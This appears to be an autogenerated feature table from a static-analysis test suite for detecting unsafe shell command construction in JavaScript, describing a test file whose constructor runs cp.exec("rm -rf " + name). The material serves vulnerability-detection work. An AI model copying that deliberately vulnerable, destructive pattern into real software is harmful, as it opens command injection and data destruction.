autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:36:2 | constru ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | cp | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | this | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:34:12 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | 'arguments' object of constructor of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | 'arguments' object of constructor of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | 'arguments' object of constructor of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | 'arguments' object of constructor of class Cla3 | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | 'arguments' object of constructor of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | (name) ... T OK\\n\\t} | assignedToPropName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | (name) ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | (name) ... T OK\\n\\t} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | (name) ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | exceptional return of constructor of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | exceptional return of constructor of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | exceptional return of constructor of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | exceptional return of constructor of class Cla3 | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | exceptional return of constructor of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | return of constructor of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | return of constructor of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | return of constructor of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | return of constructor of class Cla3 | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:13:36:2 | return of constructor of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:14:34:17 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:4 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:4 | cp | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:9 | cp.exec | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | cp.exec ... + name) | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:6:35:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:6:35:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:6:35:9 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:6:35:9 | exec | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:6:35:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:19 | "rm -rf " | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| 